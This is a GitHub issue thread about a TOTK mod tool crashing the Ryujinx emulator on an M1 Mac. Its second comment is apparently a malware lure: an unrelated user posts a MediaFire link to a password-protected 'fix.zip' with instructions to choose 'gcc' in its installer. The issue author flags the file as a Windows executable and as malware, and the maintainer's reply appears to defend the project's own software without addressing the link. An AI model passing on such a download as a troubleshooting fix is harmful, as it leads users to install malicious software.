### ISSUE TITLE
Ryujinx crashes when the mod is enabled(Apple Silicon)

### ISSUE THREAD

**Issue by gorkareplay** [hoverbike1/TOTK-Mods-collection#184]
I have an m1 mac running MacOS Sonoma and got the app to work by launching the unix executable through terminal, but with any of the presets and manual configurations when I launch Totk with the mod enabled make it think for a bit and crash ryujinx after the cache finishes loading

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gorkareplay** [comment]
and what exactly will that do?

**Comment by gorkareplay** [comment]
also that is a microsoft executable

**Comment by gorkareplay** [comment]
also that is malware

**Comment by hoverbike1** [comment]
> also that is malware

Explained this before, i'll refer to this picture, disregard the language of "lazy pack generator", this still applies, albeit to this other software.
![image](https://github.com/user-attachments/assets/09fe5903-5df6-4d6c-967e-214f661e7de1)
As for the repo, you can find and view the code yourself at @MaxLastBreath who has a repo called TOTK-mods.
The MacOS (Intel & Apple Silicon) ports are done by @alvindimas05 who has a repo called TOTK-mods.


> also that is a microsoft executable

We primarily focus on shipping for Windows, with a side of Linux.


> and what exactly will that do?

I don't understand what you mean with this question, please explain further.


> I have an m1 mac running MacOS Sonoma and got the app to work by launching the unix executable through terminal, but with any of the presets and manual configurations when I launch Totk with the mod enabled make it think for a bit and crash ryujinx after the cache finishes loading

I would suggest giving the "Apple Silicon" labeled download a release, this should function with your system, without any need to use terminal, however, it is hard for us to provide any level of support for Apple platforms, as we simply don't have any such devices, which are required to develop for it. Alongside another hefty subscription fee for developers, which we feel the same way about as we do about the fee to sign our apps on Windows - Its just too expensive for us.

Should you have any further questions, I would suggest you visit the Discord for support, or take contact with the Apple platform developer @alvindimas05
